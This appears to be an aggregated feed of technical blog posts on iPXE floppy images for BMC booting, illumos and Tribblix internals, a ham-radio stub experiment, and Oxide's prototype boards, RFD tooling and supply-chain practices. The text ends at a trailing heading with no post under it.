Difficult Hardware Nahum Shalman

This content can also be found as part of https://github.com/tinkerbell/ipxedust/pull/88 in DifficultHardware.md.

Most modern hardware is capable of PXE booting just fine. Sometimes strange combinations of different NIC hardware / firmware connected to specific switches can misbehave.

In those situations you might want to boot into a build of iPXE but completely sidestep the PXE stack in your NIC firmware.

We already ship an ipxe.iso that can be used in many situations, but most of the time that requires either an active connection from a virtual KVM client or network access from the BMC to a storage target hosting the ISO.

Some BMCs support uploading a floppy image into BMC memory and booting from that. To support that use case we have started packaging our EFI build into a bootable floppy image that can be used for this purpose.

For other projects or use cases that wish to replicate this functionality: with appropriate versions of qemu-img, dosfstools, and mtools, you can build something similar yourself from upstream iPXE like so:

# create a 1440K raw disk image
qemu-img create -f raw ipxe-efi.img 1440K
# format it with an MBR and a FAT12 filesystem
mkfs.vfat --mbr=y -F 12 -n IPXE ipxe-efi.img

# Create the EFI expected directory structure
mmd -i ipxe-efi.img ::/EFI
mmd -i ipxe-efi.img ::/EFI/BOOT

# Copy ipxe.efi as the default x86_64 efi boot file
curl -LO https://boot.ipxe.org/ipxe.efi
mcopy -i ipxe-efi.img ipxe.efi ::/EFI/BOOT/BOOTX64.efi

As of this writing, other projects are working on automating the upload of this floppy image to a BMC; see the draft PR https://github.com/bmc-toolbox/bmclib/pull/347

Retiring isaexec in Tribblix The Trouble with Tribbles...

One of the slightly unusual features in illumos, and Solaris because that's where it came from, is isaexec.

This facility allows you to have multiple implementations of a binary, and then isaexec will select the best one (for some definition of best).

The full implementation allows you to select from a wide range of architectures. On my machine it'll allow the following list:

amd64 pentium_pro+mmx pentium_pro
pentium+mmx pentium i486 i386 i86
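The selection logic amounts to walking that list in order of preference and executing the first matching binary that exists. A minimal sketch in Python (the paths and helper are illustrative, not the actual illumos implementation):

```python
import os

def isaexec(name, isa_list, base="/usr/bin"):
    """Walk the ISA preference list and return the first matching
    implementation of `name` that exists and is executable."""
    for isa in isa_list:
        candidate = os.path.join(base, isa, name)
        if os.access(candidate, os.X_OK):
            # The real isaexec would exec() the candidate; we just return it.
            return candidate
    raise FileNotFoundError(name)

# The preference list above, best first; on a 64-bit kernel amd64 leads,
# so a 64-bit binary wins whenever it is present.
isas = ["amd64", "pentium_pro+mmx", "pentium_pro",
        "pentium+mmx", "pentium", "i486", "i386", "i86"]
```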

If you wanted, you could ship a highly tuned pentium_pro binary, and eke out a bit more performance.

The common case, though, and it's actually the only way isaexec is used in illumos, is to simply choose between a 32-bit and 64-bit binary. This goes back to when Solaris and illumos supported 32-bit and 64-bit hardware in the same system (and you could actually choose whether to boot 32-bit or 64-bit under certain circumstances). In this case, if you're running a 32-bit kernel you get a 32-bit application; if you're running 64-bit then you can get the 64-bit version of that application.

Not all applications got this treatment. Anything that needed to interface directly with the kernel did (eg the ps utility). And for others it was largely about performance or scalability. But most userland applications were 32-bit, and still are in illumos. (Solaris has migrated most to 64-bit now; we ought to do the same.)

It's been 5 years or more since illumos removed the 32-bit kernel, so the only option is to run in 64-bit mode. So now, isaexec will only ever select the 64-bit binary.

A while ago, Tribblix simply removed the remaining 32-bit binaries that isaexec would have executed on a 32-bit system. This saved a bit of space.

The upcoming m32 release goes further. In almost all cases isaexec is no longer involved, and the 64-bit binary sits directly in the PATH (eg, in /usr/bin). There's none of the wasted redirection. I have put symbolic links in, just in case somebody explicitly referenced the 64-bit path.

This is all done by manipulating packaging - Tribblix runs the IPS package repo through a transformation step to produce the SVR4 packages that the distro uses, and this is just another filter in that process.

(There are a handful of exceptions where I still have 32-bit and 64-bit. Debuggers, for example, might need to match the bitness of the application being debugged. And the way that sh/ksh/ksh93 is installed needs a slightly less trivial transformation to get it right.)

Modernizing scripts in Tribblix The Trouble with Tribbles...

It's something I've been putting off for far too long, but it's about time to modernize all the shell scripts that Tribblix is built on.

Part of the reason it's taken this long is the simple notion of, if it ain't broke, don't fix it.

But some of the scripting was starting to look a bit ... old. Antiquated. Prehistoric, even.

And there's a reason for that. Much of the scripting involved in Tribblix is directly derived from the system administration scripts I've been using since the mid-1990s. That involved managing Solaris systems with SVR4 packages, and when I built a distribution derived from OpenSolaris, using SVR4 packages, I just lifted many of my old scripts verbatim. And even new functionality was copied or slightly modified.

Coming from Solaris 2.3 through 10, this meant that they were very strictly Bourne Shell. A lot of the capabilities you might expect in a modern shell simply didn't exist. And much of the work was to be done in the context of installation (i.e. Jumpstart) where the environment was a little sparse.

The most obvious code smell is extensive use of backticks rather than $(). Some of this I've refactored over time, but looking at the code now, not all that much.

One push for this was adding ShellCheck to Tribblix (it was a little bit of a game getting Haskell and Cabal to play nice, but I digress).

Running ShellCheck across all my scripts gave it a lot to complain about. Some of the complaints are justified, although many aren't (it's very enthusiastic about quoting everything in sight, even when that would be completely wrong).

But generally it's encouraged me to clean the scripts up. It's even managed to find a bug, and inspecting code it merely thinks is rubbish has turned up a few more.

The other push here is to speed things up. Tribblix is often fairly quick in comparison to other systems, but it's not quick enough for me. But more of that story later.

Scribbled Dummy Load Blueprints Josef "Jeff" Sipek

Yesterday, I saw KM1NDY’s blog post titled Scribbled Antenna Blueprints. I wasn’t going to comment…but here I am. :)

I thought I’d set up a similar contraption (VHF instead of HF) to see what exactly happens. I have a 1 meter long RG-8X jumper with BNC connectors, a BNC T, and a NanoVNA with a 50Ω load calibration standard.

But first, let’s analyze the situation!

Imagine you have a transmitter/signal generator and you connect it to a dummy load. Assuming ideal components, absolutely nothing would get radiated. Now, imagine inserting an open stub between the two. In other words, the T has the following connections:

  1. the generator
  2. 50Ω load
  3. frequency-dependent impedance

Let’s do trivial math! Let’s call the total load that the generator sees Z_total and the impedance provided by the stub Z_stub. The generator side of the T is connected to the other ports in parallel. Therefore:

Z_total = (50 * Z_stub) / (50 + Z_stub)

So, when would we get a 1:1 SWR? When the generator sees a 50Ω load. When will it see 50Ω? When Z_stub is very large; the extreme of which is when that side of the T is open.
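A quick numeric check makes that limit obvious (a throwaway sketch, treating the stub impedance as purely resistive for simplicity):

```python
def z_total(z_stub, z_load=50.0):
    """Impedance the generator sees: the 50-ohm load in parallel
    with whatever impedance the stub presents."""
    return (z_load * z_stub) / (z_load + z_stub)

# As Z_stub grows, the parallel combination approaches the 50-ohm load,
# which is exactly the open-stub (very high impedance) case.
for z_stub in (50.0, 500.0, 5000.0, 50000.0):
    print(f"Z_stub = {z_stub:8.0f} -> Z_total = {z_total(z_stub):.2f}")
```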

If you are a ham, you may remember from when you were studying for the Amateur Extra exam that transmission line stubs can transform impedance. A 1/2 wave stub “copies” the impedance. A 1/4 wave stub “inverts” the impedance. For this “experiment” we need a high impedance. We can get that by either:

  1. open 1/2 wave stub
  2. shorted 1/4 wave stub

Since the “design” from the scribble called for an open, we’ll focus on the 1/2 wave open stub.

Now, back to the experiment. I have a 1 m long RG-8X which has a velocity factor of 0.78. So, let’s calculate the frequency for which it is a 1/2 wave—i.e., the frequency where the wavelength is 2 times the length of the coax:

f = 0.78 * c / (2 * 1 m)

This equals 116.9 MHz. So, we should expect 1:1 SWR at 117-ish MHz. (The cable is approximately 1 m long and the connectors and the T add some length, so it should be a bit under 117.)

Oh look! 1.015:1 SWR at 110.5 MHz.

(Using 1.058 m in the calculation yields 110.5 MHz. I totally believe that between the T and the connectors there is close to 6 cm of extra (electrical) length.)
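Both numbers are easy to reproduce as a small script (c and the 0.78 velocity factor come from the post; 1.058 m is the back-calculated electrical length):

```python
C = 299_792_458  # speed of light, m/s

def half_wave_freq(length_m, velocity_factor=0.78):
    """Frequency at which an open stub of this physical length
    is an electrical half wave."""
    return velocity_factor * C / (2 * length_m)

print(half_wave_freq(1.0) / 1e6)    # about 116.9 MHz for the nominal 1 m
print(half_wave_freq(1.058) / 1e6)  # about 110.5 MHz with the extra length
```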

But wait a minute, you might be saying, if high impedance is the same as an open, couldn’t we just remove the coax stub from the T and get the same result? Yes! Here’s what the NanoVNA shows with the coax disconnected:

The SWR is 1.095:1 at 110.5 MHz and is better than 1.2:1 across the whole 200 MHz sweep! And look at that impedance! It’s about 50Ω across the whole sweep as well!

We can simplify the circuit even more: since we’re only using 2 ports of the T, we can take the T out and connect the 50Ω load to the NanoVNA directly. We just saved $3 from the bill of materials for this “antenna”!

(In case it isn’t obvious, the previous two paragraphs were dripping with sarcasm, as we just ended up with a dummy load connected to the generator/radio and called it an antenna.)

Will It Antenna?

How could a dummy load transmit and receive signals? Glad you asked. In the real world we don’t use ideal components. There are small mismatches between connectors, the characteristic impedance of the coax is likely not exactly 50Ω, the coax shield is not quite 100%, the transmitter’s/generator’s output isn’t exactly 50Ω, and so on.

However, I expect all these imperfections do not amount to anything that will turn this contraption into an antenna. I bet that the ham that suggested this design used an old piece of coax which had even worse characteristics than the “within manufacturing tolerances” specs you get when the coax is new. Another option is that the coax is supposed to be connected in some non-standard way. Mindy accidentally found one as she was packing up when she disconnected the shield but not the center conductor. Either way, this would make the coax not a 1/2 wave open stub, and the resulting impedance mismatch would cause the whole setup to radiate.

I’d like to thank Mindy for posting about this design. It provided me with a fun evening “project” and a reason to write another blog post.

Finally, I’ll leave you with a photo of my experimental setup.

Speed up zone installation with this one weird trick The Trouble with Tribbles...

Sadly, the trick described below won't work in current releases of Solaris, or any of the illumos distributions. But back in the day, it was pretty helpful.

In Solaris 10, we had sparse root zones - which shared /usr with the global zone, which not only saved space because you didn't need a copy of all the files, but creating them was much quicker because you didn't need to take the time to copy all the files.

Zone installation for sparse root zones was typically about 3 minutes for us - this was 15 years ago, so mostly spinning rust and machines a bit slower than we're used to today.

That 3 minutes sounds quick, but I'm an impatient soul, and so were my users. Could I do better?

Actually, yes, quite a bit. What's contributing to that 3 minutes? There's a bit of adding files (the /etc and /var filesystems are not shared, for reasons that should be fairly obvious). And you need to copy the packaging metadata. But that's just a few files.

Most of the time was taken up by building the contents file, which simply lists all the installed files and what package they're in. It loops over all the packages, merging all the files in that package into the contents file, which thus grows every time you process a package.

The trick was to persuade it to process the packages in an optimal order. You want to do all the little packages first, so that the contents file stays small as long as possible.

And the way to do that was to recreate the /var/sadm/pkg directory. It was obvious that it was simply reading the directory and processing packages in the order that it found them. And, on ufs, this is the order that the packages were added to the directory. So what I did was move the packages to one side, create an empty /var/sadm/pkg, and move the package directories back in size order (which you can get fairly easily by looking at the size of the spooled pkgmap files).

This doesn't quite mean that the packages get processed in size order, as it does the install in dependency order, but within those constraints it otherwise does them in size order.
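A toy model shows why the ordering matters: if each merge rewrites a contents file whose size is the running total of everything merged so far, the total work is the sum of the prefix sums, which processing small packages first minimizes (the package sizes below are made up):

```python
from itertools import accumulate

def total_merge_cost(package_sizes):
    """Toy cost model: merging a package rewrites the contents file,
    so each step costs the cumulative size merged so far."""
    return sum(accumulate(package_sizes))

sizes = [5000, 10, 20, 40, 300, 80]  # made-up entry counts per package
print(total_merge_cost(sorted(sizes, reverse=True)))  # big-first: 31990
print(total_merge_cost(sorted(sizes)))                # small-first: 6160
```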

The results were quite dramatic - with no other changes, this took zone install times from the original 3 minutes to 1 minute. Much happier administrators and users.

This trick doesn't work at all on zfs, sadly, because zfs doesn't simply create a linear list of directory entries and put new ones on the end.

And all this is irrelevant for anything using IPS packaging, which doesn't do sparse-root zones anyway, and is a completely different implementation.

And even in Tribblix, which does have sparse-root zones like Solaris 10 did, and uses SVR4 packaging, the implementation is orders of magnitude quicker because I just create the contents file in a single pass, so a sparse zone in Tribblix can install in a second or so.

Remnants of closed code in illumos The Trouble with Tribbles...

One of the annoying issues with illumos has been the presence of a body of closed binaries - things that, for some reason or other, were never able to be open sourced as part of OpenSolaris.

Generally the illumos project has had some success in replacing the closed pieces, but what's left isn't entirely zero. It took me a little while to work out what's still left, but as of today the list is:


Actually, this isn't much. In terms of categories:

Trusted, which includes those label_encodings, and labeld. Seriously, nobody can realistically run trusted on illumos (I have, it's ... interesting). So these don't really matter.

The iconv files actually go with the closed iconv binary, which we replaced ages ago, and our copy doesn't and can't use those files. We should simply drop those (they will be removed in Tribblix next time around).

There's a set of files connected to IKE and IPSec. We should replace those, although I suspect that modern alternatives for remote access will start to obsolete all this over time.

The scsi_vhci files are to get multipathing correctly set up on some legacy SAN systems. If you have to use such a SAN, then you need them. If not, then you're in the clear.

There are a number of drivers. These are mostly somewhat aged. The sdp stuff is being removed anyway as part of IPD29, so that'll soon be gone. Chances are that very few people will need most of these drivers, although mpt was fairly widely used (there was an open mpt replacement in the works). Eventually the need for the drivers will dwindle to zero as systems containing them no longer exist (and, by the same token, we wouldn't need them for something like an aarch64 port).

Which just leaves 2 commands.

Realistically, the XPG4 more could be replaced by less. The standard was based on the behaviour of less, after all. I'm tempted to simply delete /usr/xpg4/bin/more and make it a link to less and have done with it.

As for pax, it's required by POSIX, but to be honest I've never used it, haven't seen anywhere that uses it, and read support is already present in things like libarchive and gtar. The heirloom pax is probably more than good enough.

In summary, illumos isn't quite fully open source, but it's pretty close and for almost all cases we could put together a fully functional open subset that'll work just fine.

Static Site Generators The Trouble with Tribbles...

The current Tribblix website is a bit of a hack. Technically it's using a static site generator - a simple home-grown script that constructs pages from a bit of content and boilerplate - but I wanted to be able to go a bit further.

I looked at a few options - and there are really a huge number of them - such as Hugo and Zola. (Both are packaged for Tribblix now, by the way.)

In the end I settled on nanoc. That's packaged too (and I finally got around to having a very simple - rather naive - way of packaging gems).

Why nanoc, though? In this case it was really because it could take the html page fragments I already had and create the site from those, and after tweaking it slightly I ended up with exactly the same html output as before.

Other options might be better if I was starting from scratch, but it would have been much harder to retain the fidelity of the existing site.

One advantage of the new system is that I can put the site under proper source control, so the repo is here.

There's still a lot of work to be done on filling out the content, but it should be easier to evolve the Tribblix website in future.

Building Big Systems with Remote Hardware Teams Oxide Computer Company Blog

The product we’re building, a rack-scale computer, is specifically designed to be a centralized, integrated product because that’s what our customers need. This requirement and the design choices we’ve made to meet this need create some daily efficiency challenges for our team. As a remote-first company, we’re designing this product with team members (including the hardware team) across most North American time zones and even multiple continents, so a large portion of our team is not going into the office/lab every day for hands-on access to "production" hardware. At first blush, the design of our product and the design of our team appear to conflict at some level: we value remote work, but we can’t ship entire racks to the homes of our teammates for both practical and economic reasons.

Our racks are rather inconvenient for a home installation: over 2.3 m (7.7') tall, very heavy, and with 3-phase power inputs that aren’t usable in a typical residential setting. Aside from the logistical challenges of a home installation, there’s also the actual cost: these are expensive, and outfitting each remote team member with a full, or even partially populated, rack is economically infeasible. Further, a racked target is not terribly useful for development, as accessing it for debugging is challenging: we have no externally accessible debugging interfaces or other things that can be repurposed as such, because our customers don’t want that stuff! We can (and do!) travel some to get hands-on with a full system, but it became clear early on in the development cycle that we needed more convenient ways of being productive remotely.

Remote productivity on this design is a multi-faceted problem and the solution includes robust remote access to fully-built and partially built systems back at HQ, but that alone does not address all the needs.

This post will deal more with the philosophy we have developed around our non-product board designs as we’ve learned what works for us on our journey through remote development. Some of these tools have become pivotal in increasing our remote efficiency, especially early in the design cycle when the "real" systems weren’t very functional and remote accessibility was limited. For more board-by-board specifics, check out a great Oxide and Friends episode where we talked through the genesis of many of these designs. With many of our team members who designed these boards on-hand, it was a great discussion and a lot of fun talking about the role prototypes have played in facilitating our actual product design.

Not a distraction from "real" product design

We fully believe that these small designs, most of which end up taking around a week of engineering time to design, have radically accelerated or augmented our "real" product designs. I detail a couple of specific examples of how this prototype hardware helped us, from enabling software work before any "real" hardware existed, to prototyping circuits like our multiplexed QSPI flash design. Specifically for the QSPI design, the initial circuit just did not work like we expected and using these boards we were able to quickly (and inexpensively!) iterate on the design, directly informing the work on our "real" designs, and in this case, likely saving a spin of our production hardware that wouldn’t have worked. We were even able to connect our SPI mux to extant development hardware from AMD and validate our assumptions before building a server sled. The Oxide and Friends episode mentioned above covers some of these and other stories in more detail.

Our team fully embraces toolmaking up and down the stack: it informs many of our design choices and directions. Bryan recently gave a talk on the concept, and this is yet another application of it. Just like software teams build tools to help build software, we’re building hardware tools to help build hardware and software.

To emphasize how pervasive this culture is in our company, Dan made a great point during the Oxide and Friends chat:

Anyone in the company is empowered to do this.

We don’t need approval or sign-off, we just go do what’s right for Oxide, and I think this quote from Aaron really sums up our team’s viewpoint:

Investments in tools pay off long-term and often faster than you’d think!

We’ve seen time and time again that the effort put into these small boards has paid back big dividends in team productivity, development ease, and bug chasing.

Why we needed custom hardware vs off-the-shelf development boards

There are multiple aspects to our need for custom hardware. First, the custom designs supplement our use of off-the-shelf (OTS) hardware. We use many off-the-shelf development boards and even provide support for a number of these boards in Hubris. These are great for many use-cases, but less great when we are trying to model specific circuits or subsystems of our product designs. Second, we have numerous examples of custom boards that were built simply because we could find no useful OTS alternative: boards like the Dimmlet (I2C access to DDR4 SPD EEPROMs) and the K.2 (U.2 → PCIe x4 CEM breakout) fall into this category.

Narrow PMOD-interface board for interfacing with the SPD EEPROMs on the two installed DDR4 DIMMs
Figure 1. Narrow PMOD-interface board for interfacing with the SPD EEPROMs on the two installed DDR4 DIMMs
PCIe U.2 connector to PCIe x4 CEM connector extender board
Figure 2. PCIe U.2 connector to PCIe x4 CEM connector extender board

Thriftiness in practice

While this strategy of developing prototypes touches on many Oxide values (as discussed below), Thriftiness deserves special attention. Making inexpensive hardware has never been easier! Quick-turn PCB houses, both offshore and onshore, have achieved incredibly low cost while maintaining high quality. We had 50 K.2r2 PCBs with impedance control and a framed stencil fabricated for <$400 USD. For something so simple (BOM count <10 parts) we built these in-house using an open-source pick and place machine (Lumen PNP from Opulo) and a modified toaster oven with a Controleo3 controller. We’ve also done hot-plate reflow and hand assembly. And while we will outsource assembly when it makes sense due to complexity or volume, for these simple, low-volume designs we see real benefits in self-building: we can build as few or as many as we want, do immediate bring-up and feed any rework directly into the next batch, and there’s no overhead in working with a supplier to get them kitted parts, quotes, questions, etc.

A good example of this was on the Dimmlet: I messed up the I2C level translator circuit by missing the chip’s requirements about which side was connected to the higher voltage. Since I was hand-assembling these, I built one, debugged it, and figured out the rework required to make it function. Since this rework included flipping the translator and cutting some traces, catching this issue on the first unit made reworking the remaining ones before going through assembly much easier.

All of that to say, the cost of building small boards is really low. A single prototype run that saves a "real" board re-spin pays for itself immediately. Enabling software development before "real" hardware lands pays for itself immediately. Even when things don’t work out, the cost of failure is low; we lost a few hundred dollars and some engineering time, but learned something in the process.

Because of this low cost, we can use a "looser" design process, with fewer tollgates and a less formal review/approval process. This lowers the engineering overhead required to execute these designs. We can have more informal reviews, a light-weight (if any) specification and allow design iteration to happen naturally. Looking at the designs, we have multiple examples of design refinement like the K.2r2 which improved on the electrical and mechanical aspects of the original K.2, and a refinement to the sled’s bench power connector boards resulting in a more compact and ergonomic design that improves mating with sleds in their production sheet metal.

Experience and the evolution of our strategy

Early in our company’s history, the team built out a development platform, named the Gemini Bring-up board, representing the core of the embedded design for our product: our Gemini complex (Service Processor + Root of Trust + Management Network plane). The resulting platform was a very nice development tool, with hilarious silkscreen and some awesome ideas that have continued informing current and future designs, but we rapidly outgrew this first design. While the major choices held, such as which microcontrollers are present, the still-nebulous design of the actual product, and subsequent design iteration, left the periphery of the bring-up board bearing little resemblance to the final Gemini complex design. The changes came from a variety of unforeseen sources: the global chip shortage forced BOM changes, and a better understanding of the constraints/needs of our product necessitated architecture changes, resulting in further drift between this platform and what we intended to implement in the product.

First custom Oxide hardware with SP
Figure 3. First custom Oxide hardware with SP and RoT

A re-imagining of what would be most useful gave way to the Gimletlet, a major work-horse for in-house development, designed (and initially hot-plate reflowed) by Cliff. The Gimletlet is essentially a development board using the STM32H7 part that we’re using as our Service Processor (SP) in our product. It provides power and basic board functionality (including a couple of LEDs), a dedicated connector for a network breakout card, and breaks out most of the remaining I/O to PMOD-compatible headers. This choice has been key to enabling a very modular approach to prototyping, recognizing that less is more when it comes to platforms. The Gimletlet design means that we can build purpose-built interface cards without needing to worry about network connectivity or processor support, simplifying the design of the interface cards and letting them share a core board support package.

Custom STM32H7 board with I/O breakout to many PMOD interfaces
Figure 4. Custom STM32H7 board with I/O breakout to many PMOD interfaces

Our team has learned that modularity is key to making these small proto-boards successful. It does mean workspaces can get a little messy with a bunch of boards connected together, but we’ve found this to be a good balance, allowing our team members to cobble together a small, purpose-built system that meets their specific needs, and allows us to easily share these common, low-cost setups to our distributed team. The modularity also means that storing them is relatively easy as they can be broken down and stashed in small boxes.

Gimletlet with Ignitionlet
Figure 5. Gimletlet with Ignitionlet, SPI Mux, Dimmlet, RoTCarrierCarrier, and RoTCarrier connected

Our values tie-ins

There are some obvious values tie-ins like teamwork and thriftiness as already mentioned, but as I started writing this section I realized we hit more of our values than I had even realized. Rather than attempt to enumerate each one, I wanted to hit on some maybe less-obvious ones:

  • Humor: The silkscreens on our boards contain jokes, word-play and other silliness because we enjoy making our co-workers laugh and want our work to be fun too. The funny silkscreen is often snuck in post-review, and thus a surprise to co-workers as they open the finished hardware. Engineering demands creativity — I’ve worked at places where silliness baked into a board would be frowned upon, but at Oxide it is supported and even encouraged! This enables team members to bake a little bit of their personality into these designs, while allowing the rest of the team to have fun as it’s discovered.

Gemini Bring up board with silkscreen riffing on Root of Trust vs Route of Trust vs Newt of Trust as well as pointing out the untrustworthiness of vendor boot ROMs
Figure 6. Preview of Gemini Bring up board
  • Rigor/Urgency: We often find Rigor and Urgency in tension with each other, but in this case, they are complementary. The time from concept to ordering of a PCB on some of these designs is measured in hours or days, not weeks. Being able to move quickly from a paper concept to a physical manifestation of that concept in real hardware has been instrumental in grounding our assumptions and informing our designs. We’re able to quickly iterate in areas where we have questions, driving resolution without holding up the rest of the design. This work directly contributes to better architecture and circuit design decisions in our "real" designs.

  • Transparency/Responsibility/Teamwork: We believe in openness, including our own designs, so we’re opening up the various proto-board design repositories for reference and hope that something there is useful in your own hardware endeavors. These designs are things that we wished existed and so created them, some of these may be a bit specific for our use-cases, but there are some generally useful things there too. These are mostly KiCAD designs and support for them is "as-is" since we’re focused on getting our product out the door, but feel free to reach out in the repo with questions and we’ll attempt to answer on a best-effort basis.

A Tool for Discussion Oxide Computer Company Blog

At Oxide, RFDs (Requests for Discussion) play a crucial role in driving our architectural and design decisions. They document the processes, APIs, and tools that we use. The workflow for the RFD process is based upon those of the Golang proposal process, Joyent RFD process, Rust RFC (Request for Comments) process, and Kubernetes proposal process. To learn more about RFDs and their process, you can read this post.

Similar to RFCs, our philosophy of RFDs is to allow timely discussion of rough ideas, while still serving as a permanent repository for more established ones.

Oxide RFDs are essentially a collection of AsciiDoc documents, collected in a GitHub repo. They can be quickly iterated on in a branch, discussed actively as part of a pull request to be merged, or commented upon after having been published.

Whilst a repo is a useful storage and collaboration tool, there are a number of drawbacks: it doesn’t provide the best reading experience, is limited in terms of AsciiDoc support, and is challenging to share externally. To address these issues we developed an internal RFD site. This post serves as a showcase for that site and gives a brief look at some of its features.

RFD directory

Users land directly on the directory. By default it is sorted by last updated to give the user an idea of the RFDs that are actively being worked on.

RFD site homepage

Full-text search

Full-text search is powered by a self-hosted Meilisearch instance. The search index is automatically updated whenever an RFD is edited. Users can access the search function through the navigation menu or by using the hotkey CMD+K and can quickly navigate through the search results using their keyboard whilst previewing the associated RFD.

Search dialog showing results and a preview of the matched RFD

Inline PR discussion

The discussion surrounding an RFD is crucial to understanding its context, but until recently users would have to open the associated pull request in a separate tab to view its comments. To improve this experience, we’ve implemented a feature that uses the GitHub API to fetch the pull request discussion and display the comments that are still actively attached to a line alongside the part of the document they relate to.

Pop-over menu with comments that relate to the part of the document they are next to
Figure 1. Inline comments

We achieve this by using the getLineNumber function in asciidoctor.js, which allows us to map the raw line number of the comment (from the GitHub API) to the nearest block in the rendered document. While this method may not pinpoint the exact line, it is usually accurate enough.
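The mapping described above can be sketched as pure logic. This is a hypothetical illustration, not the site's actual code: `nearest_block_line` and its inputs are invented names, and it assumes the block start lines (as asciidoctor.js's getLineNumber would report them) arrive sorted in ascending order.

```rust
/// Given the starting source line of each rendered block (sorted
/// ascending, non-empty) and the raw line number a GitHub review
/// comment is attached to, return the start line of the nearest
/// block at or before the comment.
fn nearest_block_line(block_lines: &[u32], comment_line: u32) -> u32 {
    block_lines
        .iter()
        .copied()
        .take_while(|&line| line <= comment_line)
        .last()
        // If the comment precedes every block, fall back to the first.
        .unwrap_or(block_lines[0])
}
```

In a document whose blocks begin at lines 1, 10, 25, and 40, a comment on raw line 27 would land on the block starting at line 25, which is "usually accurate enough" in the sense described above.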

To avoid slowing down page load times, we use the Remix deferred response feature to stream in the comments asynchronously, holding only for the critical RFD content to finish loading.

  const rfd = await fetchRfd(num, user)
  if (!rfd) throw resp404()

  // this must not be awaited, it is being deferred
  const discussionPromise = fetchDiscussion(rfd.discussion_link, user)

  return defer({ rfd, discussionPromise })

Users can access the full discussion of an RFD at any time by opening a dialog regardless of their current location on the page. This dialog also provides the ability to jump directly to the line that is being commented on.

Dialog with a GitHub PR style timeline showing comments and snippets of the raw document
Figure 2. Full discussion

Inter-RFD linking

When an RFD document references another RFD within its content, the user can hover over the reference to see a preview of the title, authors, status, and the date of the last update. This makes it easy for users to understand the context and relationship between different RFDs, and quickly access the related documents.

Pop-over that previews the linked RFD

Jump-to menu

For users who know the title or number of the RFD they want to view, a menu can be opened by pressing CMD+/ from any page on the site. This menu allows users to quickly filter and select the desired RFD using their keyboard.

Navigation modal that shows a list of RFDs being filtered by an input


The internal tooling around RFDs is always improving, and as it does, we hope that the way we collaborate will also improve. There is still work to be done in terms of discoverability of documentation, such as adding more tools to filter and tag RFDs, and creating collections of documents. This will make it easier for new employees to get up to speed, and make it easier to manage the challenges that come with a growing team and an increasing amount of documentation. Having a better understanding of the whole stack is valuable, as it allows us to better understand the impact of our work on other parts of the product.

Additionally, we need to consider how we can make this process more accessible to everyone. Writing an RFD currently requires cloning a Git repo, running a script, committing, pushing, and making a PR. We are thinking about how to do this all through the web app with an embedded text editor. Oxide is and will continue to be an engineering-led organization, but RFDs are not just for engineers. Making it easier for everyone to create and collaborate on these documents will result in richer conversations.

Navigating Today’s Supply Chain Challenges Oxide Computer Company Blog

We’ve all experienced it. From toilet paper, exercise equipment, toys, cars, and everything in between, the supply chain during COVID has been blamed for many consumer goods shortages, and rightfully so. During lockdown, how many of us stalked our local warehouse clubs for that elusive delivery of toilet paper, scared of the implications if none was found? Or maybe you tried negotiating the price on eBay for a set of weights that was 3-4x the usual cost? Those shortages seen by the average consumer also heavily plagued electronics manufacturers and their customers.

Now imagine being a start-up during COVID. A start-up in the electronics industry. A start-up in competition for those highly demanded, severely constrained electronic components. A start-up with no name recognition, no history, and no relationships with manufacturers and / or distributors. Seemingly simple items like capacitors and resistors saw 20+ week lead times, with other parts advertising lead times of 52, 98, and even 104+ weeks. That’s what the supply chain looked like for Oxide in 2021, and in many component categories, still looks like today.

Our Operations Team has been hard at work since late 2020 trying to secure supply for a product that, throughout 2021 and into 2022, has continued to undergo design changes. The procurement function became a delicate balancing act, taking into account lead time, cost, and industry outlooks, and working closely with our engineering team regarding upcoming design changes. How much faith could we put in the demand for a given part today, when we knew an updated Bill of Materials (BOM) would be published in a few weeks? For parts with lead times that would extend past our first customer ship date, how much supply should we purchase 12-18 months ahead of schedule, knowing our design was not finalized?

Working with borrowed money (literally, from our investors), we needed to quickly put in place a robust procurement system to balance the issues we faced. We needed an actionable plan that solved supply issues on many fronts. So, we did what the average consumer did during COVID: we stalked the stores (in our case, online distributors) day and night, weekdays and weekends, waiting for restocks. We negotiated with suppliers, investigating whether there was additional inventory available but being held back. In some cases, being a start-up and only needing small quantities was helpful. We were able to get sample quantities of parts that would last us through our engineering build cycle. However, being a small start-up also meant we were up against the big guys. Getting recognition of our existence, let alone inventory allocated to us, was often a stressful, tedious process.

What have we found that helped our team the most? Strategic supplier relationships.

There is not enough that can be said for setting up strong, trusting relationships with your suppliers. All of us on the Operations Team at Oxide have extensive backgrounds at some of the world’s top manufacturing and supply chain companies. We’ve seen and heard it all. We know the lengths many procurement professionals will go to in order to secure supply during allocations. They may inflate demand knowing their allocation quantity is based on their demand, or they may communicate required dates that are several weeks or months ahead of when the supply is actually needed. However, those responsible for the supply allocations usually realize this. When the truth comes to light, that company’s future demand is often taken with a grain of salt. It becomes difficult to trust that company again.

That’s where the Oxide Ops Team differentiates itself. Oxide’s principles and values truly drive our everyday work. We’re firmly committed to our principles of Integrity, Honesty, and Decency, and integrate them into all of our business practices. We strive to balance our sometimes conflicting values in order to strengthen our vendor relationships. Here are a few of the Oxide values and how we showcase them in our supply chain relationships.

  • Candor — We’re upfront about our needs, including quantities and dates. As these items change, we do our best to proactively communicate those changes to our suppliers. We know there will be times we need our suppliers to jump through hoops for us, to expedite, to get supply not otherwise allocated to us. However, we also understand these should be one-off instances and not the norm. We want our supplier reps to succeed just as much as we strive for success at Oxide. Being candid helps ensure we are all set up for success.

  • Rigor — We demand a lot from ourselves, but we also demand a lot from our suppliers. If a date slips or the component quality isn’t as expected, we request our supplier proactively communicate, root cause, and implement corrective action as needed. We have a small team and we rely on our suppliers to have the same sense of rigor as we do at Oxide.

  • Teamwork — We look at the relationships with our suppliers as extended team members. We want to instill in them a sense of pride for the Oxide product, just as much as we support them and their company. Successes and failures are shared amongst everyone involved. We will not be successful at Oxide without our extended team.

  • Thriftiness – We’re a start-up with maniacally focused founders, a very involved board of directors, and limited capital. We’re building a massive product while being very cognizant of costs. Given our small size and start-up status, we rely on our relationships with our suppliers, coupled with massive amounts of internet searching and price comparing, to try and get the best costs we can. We know we’re paying more for items than the big guys, but we’re trying to close that gap as much as we can. Getting our suppliers on board with our vision, and getting them excited about the Oxide rack, is instrumental in price negotiations. We’re also sure that one day we’ll be one of those big guys. :)

Aligning ourselves with suppliers we can trust and partners invested in the success of Oxide has allowed us to successfully navigate the current supply chain conditions. The importance of treating others with respect and kindness cannot be overstated. Building strong relationships on an unfaltering foundation of Integrity, Honesty, and Decency is key. Adhering to our principles and balancing our values will continue to drive our successes.

When Allocation Hits the Fan

